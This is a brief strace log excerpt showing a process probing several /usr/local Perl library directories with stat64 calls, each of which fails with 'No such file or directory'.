10587 07:33:43.389933 stat64("/usr/local/lib/site_perl/i486-linux-gnu-thread-multi", 0xbfa5d3c0) = -1 ENOENT (No such file or directory)

10587 07:33:43.389947 stat64("/usr/local/lib/perl/5.8.7", 0xbfa5d500) = -1 ENOENT (No such file or directory)

10587 07:33:43.389959 stat64("/usr/local/share/perl/5.8.7", 0xbfa5d500) = -1 ENOENT (No such file or directory)

10587 07:33:43.389971 stat64("/usr/local/lib/perl/5.8.6", 0xbfa5d500) = -1 ENOENT (No such file or directory)

